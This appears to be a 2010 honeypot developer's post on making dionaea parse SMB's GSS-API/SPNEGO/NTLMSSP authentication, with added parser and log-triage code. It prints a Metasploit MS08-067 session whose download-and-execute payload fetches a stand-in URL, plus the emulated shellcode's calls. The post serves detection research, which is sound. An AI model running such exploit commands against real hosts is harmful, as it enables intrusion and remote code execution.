metasploitable

Current dionaea trunk is metasploitable.

Getting this working was pretty nasty:

  • metasploit tries to authenticate using GSS-API
    • GSS-API requires ASN1 and embeds SPNEGO
      • SPNEGO requires ASN1 parsing, and embeds NTLMSSP

Basically, the decoded SecurityBlob of a Session Setup AndX Request looks like this:

 ###[ GSSAPI ]###
   oid= <ASN1_OID['.1.3.6.1.5.5.2']>
     ###[ SPNEGO ]###
       \NegotiationToken\
        |###[ NegTokenInit ]###
           \MechTypes\
            |###[ MechType ]###
            |  oid= <ASN1_OID['.1.3.6.1.4.1.311.2.2.10']>
           mechToken= <ASN1_STRING['NTLMSSP\x00\x01\x00\x00\x00\x15\x82\x08`\t\x00\t\x00 \x00\x00\x00\x06\x00\x06\x00)\x00\x00\x00WORKGROUPHOSTXX']>
             \###[ NTLMSSP Header sizeof(12) ]###   
                Signature           = b'NTLMSSP\x00'  sizeof(  8) off=  0 goff=  0
                MessageType         = Negotiate       sizeof(  4) off=  8 goff=  8
              ###[ NTLM Negotiate sizeof(99) ]### 
                   NegotiateFlags      = NEGOTIATE_UNICODE+....+NEGOTIATE_KEY_EXCH sizeof(  4) off=  0 goff= 12
                   \DomainNameFields\
                    |###[ NTLM Value sizeof(8) ]### 
                    |  Len                 = 9               sizeof(  2) off=  0 goff= 16
                    |  MaxLen              = 9               sizeof(  2) off=  2 goff= 18
                    |  Offset              = 32              sizeof(  4) off=  4 goff= 20
                   \WorkStationFields\
                    |###[ NTLM Value sizeof(8) ]### 
                    |  Len                 = 6               sizeof(  2) off=  0 goff= 24
                    |  MaxLen              = 6               sizeof(  2) off=  2 goff= 26
                    |  Offset              = 41              sizeof(  4) off=  4 goff= 28
                   Payload             = b'WORKGROUPHOSTXX' sizeof( 15) off= 20 goff= 32

To get this working, I had to get an ASN1 parser for python3. After being able to parse the basics with scapy's ASN1 parser, I decided to port the required parts of scapy's ASN1 parsing to python3.

Afterwards I had to declare the ASN1 structures so scapy could parse the GSS-API and SPNEGO data properly. This procedure was pretty counterintuitive, and the scapy docs did not really help.

Once scapy could deal with GSS-API and SPNEGO, I had to declare the NTLMSSP structures, which was really easy compared to the ASN1 structures.

Then there were some obscure bytes … which turned out to be the BER-encoded identifier followed by the BER-encoded length.

The required logic was added, and now it basically works.
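As an added example (this is not dionaea's code, which uses the scapy port described above), here is a standalone walk over the same nesting: a BER TLV reader that handles exactly the identifier-plus-length bytes mentioned above, an OID decoder, the SPNEGO NegTokenInit fields, and the NTLMSSP Negotiate message. The sample blob is constructed here by re-wrapping the NTLMSSP Negotiate bytes from the dump above in SPNEGO and GSS-API; tags, OIDs and field layouts follow RFC 2743, RFC 4178 and MS-NLMP, and every bounds check is an addition a honeypot needs because all of these bytes come from the attacker.

```python
"""SecurityBlob walk: GSS-API InitialContextToken -> SPNEGO NegTokenInit -> NTLMSSP NEGOTIATE. Added example."""
import struct

SPNEGO_OID = "1.3.6.1.5.5.2"
NTLMSSP_OID = "1.3.6.1.4.1.311.2.2.10"

def ber_tlv(buf, pos=0):
    """One BER identifier + length + value at buf[pos:] -> (tag, value, end). Single-byte
    identifiers and definite lengths only (all DER needs); anything else is rejected."""
    if len(buf) - pos < 2:
        raise ValueError("truncated TLV header")
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if (tag & 0x1F) == 0x1F or first == 0x80:
        raise ValueError("high-tag-number form / indefinite length not accepted")
    length = first
    if first & 0x80:                      # long form: 0x8N then N big-endian length bytes
        n = first & 0x7F
        if not 1 <= n <= 4 or pos + n > len(buf):
            raise ValueError("bad long-form length")
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise ValueError("value runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length

def ber_children(value):
    """Yield (tag, value) for each TLV directly inside a constructed value."""
    pos = 0
    while pos < len(value):
        tag, val, pos = ber_tlv(value, pos)
        yield tag, val

def decode_oid(raw):
    arcs = list(divmod(raw[0], 40)) if raw[0] < 80 else [2, raw[0] - 80]
    n = 0
    for b in raw[1:]:                     # base-128 arcs, high bit = continuation
        n = (n << 7) | (b & 0x7F)
        if not (b & 0x80):
            arcs.append(n)
            n = 0
    if n:
        raise ValueError("unterminated OID arc")
    return ".".join(map(str, arcs))

def parse_spnego_init(blob):
    """Returns (mechTypes as dotted OIDs, mechToken bytes or None)."""
    tag, inner, _ = ber_tlv(blob)
    if tag != 0x60:                       # [APPLICATION 0] InitialContextToken
        raise ValueError("not a GSS-API InitialContextToken")
    tag, oid, pos = ber_tlv(inner)
    if tag != 0x06 or decode_oid(oid) != SPNEGO_OID:
        raise ValueError("thisMech is not SPNEGO")
    tag, tok, _ = ber_tlv(inner, pos)
    if tag != 0xA0:                       # NegotiationToken CHOICE: negTokenInit [0]
        raise ValueError("expected NegTokenInit")
    tag, seq, _ = ber_tlv(tok)
    if tag != 0x30:
        raise ValueError("NegTokenInit is not a SEQUENCE")
    mech_types, mech_token = [], None
    for tag, val in ber_children(seq):    # [1] reqFlags and [3] mechListMIC are skipped
        if tag == 0xA0:                   # [0] mechTypes: SEQUENCE OF OID
            _, lst, _ = ber_tlv(val)
            mech_types = [decode_oid(v) for t, v in ber_children(lst) if t == 0x06]
        elif tag == 0xA2:                 # [2] mechToken: OCTET STRING
            t, mech_token, _ = ber_tlv(val)
            if t != 0x04:
                raise ValueError("mechToken is not an OCTET STRING")
    return mech_types, mech_token

def parse_ntlm_negotiate(msg):
    """NTLMSSP NEGOTIATE_MESSAGE (MS-NLMP 2.2.1.1): header, flags, two len/maxlen/offset fields."""
    if len(msg) < 32 or msg[:8] != b"NTLMSSP\x00":
        raise ValueError("not an NTLMSSP message")
    msg_type, flags = struct.unpack_from("<II", msg, 8)
    if msg_type != 1:
        raise ValueError("not a NEGOTIATE_MESSAGE")
    def field(at):
        ln, _maxlen, off = struct.unpack_from("<HHI", msg, at)
        if off + ln > len(msg):           # offsets are client-controlled: bounds-check them
            raise ValueError("field points outside the message")
        return msg[off:off + ln]
    return {"flags": flags, "domain": field(16), "workstation": field(24)}

def parse_security_blob(blob):
    """Whole chain; the NTLMSSP token is only decoded if NTLMSSP was offered in mechTypes."""
    mech_types, token = parse_spnego_init(blob)
    ntlm = parse_ntlm_negotiate(token) if token and NTLMSSP_OID in mech_types else None
    return {"mech_types": mech_types, "ntlm": ntlm}

def der(tag, body):
    """Short-form DER TLV, only used to build the constructed sample below."""
    assert len(body) < 0x80
    return bytes([tag, len(body)]) + body

# Constructed sample: the NTLMSSP Negotiate from the dump above, re-wrapped in SPNEGO/GSS-API.
NTLM_NEGOTIATE = (b"NTLMSSP\x00\x01\x00\x00\x00" + b"\x15\x82\x08\x60"   # type 1, flags 0x60088215
                  + b"\x09\x00\x09\x00\x20\x00\x00\x00"                  # DomainName: len 9 @ 32
                  + b"\x06\x00\x06\x00\x29\x00\x00\x00"                  # Workstation: len 6 @ 41
                  + b"WORKGROUPHOSTXX")
SAMPLE_BLOB = der(0x60, der(0x06, bytes.fromhex("2b0601050502"))         # thisMech = 1.3.6.1.5.5.2
              + der(0xA0, der(0x30, der(0xA0, der(0x30, der(0x06, bytes.fromhex("2b06010401823702020a"))))
                                  + der(0xA2, der(0x04, NTLM_NEGOTIATE)))))
```

`parse_security_blob(SAMPLE_BLOB)` yields mechTypes `['1.3.6.1.4.1.311.2.2.10']`, flags `0x60088215`, domain `WORKGROUP` and workstation `HOSTXX`, matching the dump. Two checks matter in a honeypot: the BER reader refuses indefinite lengths and lengths that overrun the buffer, and the NTLM len/offset pairs are verified against the message size before slicing, since a hostile client can point them anywhere.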

When I initially stared at this authentication scheme, I was pretty lost, so I'm totally glad I got over here.

Metasploit

use exploit/windows/smb/ms08_067_netapi
set RHOST 127.0.0.1
set PAYLOAD windows/download_exec
set URL http://example.com/test.exe
exploit
# [*] Automatically detecting the target...
# [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
# [*] Selected Target: Windows XP SP0/SP1 Universal
# [*] Attempting to trigger the vulnerability...
# [*] Exploit completed, but no session was created.

dionaea

And that's what it looks like in dionaea's logsqlite:

2010-06-30 06:32:41
  connection 22029 smbd tcp accept ::ffff:127.0.0.1:445 <- ::ffff:127.0.0.1:58411
   dcerpc bind: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) transfersyntax    
   ...
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   ...
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 34 (None (None))
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 28 (None (None))
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 0 (None (None))
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
   profile: [{'return': '0x7c814eea', 'args': ['', 'GetSystemDirectoryA'], 'call': 'GetProcAddress'}, {'return': '0x7c86136d', 'args': ['', 'WinExec'], 'call': 'GetProcAddress'}, {'return': '0x7c80c058', 'args': ['', 'ExitThread'], 'call': 'GetProcAddress'}, {'return': '0x7c801d77', 'args': ['', 'LoadLibraryA'], 'call': 'GetProcAddress'}, {'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0x7df7b0bb', 'args': ['', 'URLDownloadToFileA'], 'call': 'GetProcAddress'}, {'return': '19', 'args': ['c:\\WINDOWS\\system32', '32'], 'call': 'GetSystemDirectory'}, {'return': '0', 'args': ['', 'http://example.com/test.exe', 'c:\\WINDOWS\\system32\\a.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['c:\\WINDOWS\\system32\\a.exe', '0'], 'call': 'WinExec'}, {'return': '0', 'args': ['32'], 'call': 'ExitThread'}]

It is not perfect yet, but it works.
The calls metasploit does for fingerprinting could be implemented. Metasploit changed their shellcodes, so many shellcodes can be detected using libemu but not profiled, as some DLL management memory segments are missing.
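As an added example, not part of dionaea: a small triage helper run over the log lines above (copied here as constructed input). It flags the SRVSVC opnum 31 request the log labels as NetPathCanonicalize (MS08-067), lists every DCE/RPC request, and pulls the download URL and the executed path out of the libemu profile, which is exactly what you want before going to fetch the sample. The UUID/opnum mapping is taken from the labels in the log above; the line format is assumed to be the one shown there.

```python
"""Triage of dionaea smbd log lines. Added example; sample lines copied from the output above."""
import ast
import re

SRVSVC_UUID = "4b324fc8-1670-01d3-1278-5a47bf6ee188"
MS08_067_OPNUM = 31                      # NetPathCanonicalize, as labelled in the log above

REQUEST_RE = re.compile(r"dcerpc request: uuid '([0-9a-f-]+)' \((\w+)\) opnum (\d+)")
PROFILE_RE = re.compile(r"profile: (\[.*\])")

def triage(lines):
    """One connection's lines -> whether the MS08-067 trigger was seen, every DCE/RPC
    request as (uuid, name, opnum), whether libemu produced a profile, and the URLs
    and commands the emulated shellcode used."""
    summary = {"ms08_067": False, "requests": [], "profiled": False,
               "download_urls": [], "exec": []}
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            uuid, name, opnum = m.group(1), m.group(2), int(m.group(3))
            summary["requests"].append((uuid, name, opnum))
            if uuid == SRVSVC_UUID and opnum == MS08_067_OPNUM:
                summary["ms08_067"] = True
            continue
        m = PROFILE_RE.search(line)
        if m:
            summary["profiled"] = True
            # The profile is a Python literal (list of dicts). literal_eval parses it
            # without executing anything; never eval() text derived from attacker input.
            for call in ast.literal_eval(m.group(1)):
                if call["call"] == "URLDownloadToFile":
                    summary["download_urls"].append(call["args"][1])
                elif call["call"] == "WinExec":
                    summary["exec"].append(call["args"][0])
    return summary

# Constructed input: the relevant lines from the log above.
SAMPLE_LOG = [
    "  connection 22029 smbd tcp accept ::ffff:127.0.0.1:445 <- ::ffff:127.0.0.1:58411",
    "   dcerpc bind: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) transfersyntax",
    "   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860",
    "   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 34 (None (None))",
    "   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 28 (None (None))",
    "   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 0 (None (None))",
    "   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))",
    r"   profile: [{'return': '0x7c814eea', 'args': ['', 'GetSystemDirectoryA'], 'call': 'GetProcAddress'}, {'return': '0x7c86136d', 'args': ['', 'WinExec'], 'call': 'GetProcAddress'}, {'return': '0x7c80c058', 'args': ['', 'ExitThread'], 'call': 'GetProcAddress'}, {'return': '0x7c801d77', 'args': ['', 'LoadLibraryA'], 'call': 'GetProcAddress'}, {'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0x7df7b0bb', 'args': ['', 'URLDownloadToFileA'], 'call': 'GetProcAddress'}, {'return': '19', 'args': ['c:\\WINDOWS\\system32', '32'], 'call': 'GetSystemDirectory'}, {'return': '0', 'args': ['', 'http://example.com/test.exe', 'c:\\WINDOWS\\system32\\a.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['c:\\WINDOWS\\system32\\a.exe', '0'], 'call': 'WinExec'}, {'return': '0', 'args': ['32'], 'call': 'ExitThread'}]",
]

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

A connection with `ms08_067` set but `profiled` still false is the case the paragraph above describes: libemu detected the shellcode but could not run it to completion, so there is no URL to fetch and the raw shellcode has to be looked at by hand.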

2010/06/30/metasploitable.txt · Last modified: 2010/06/30 16:13 by common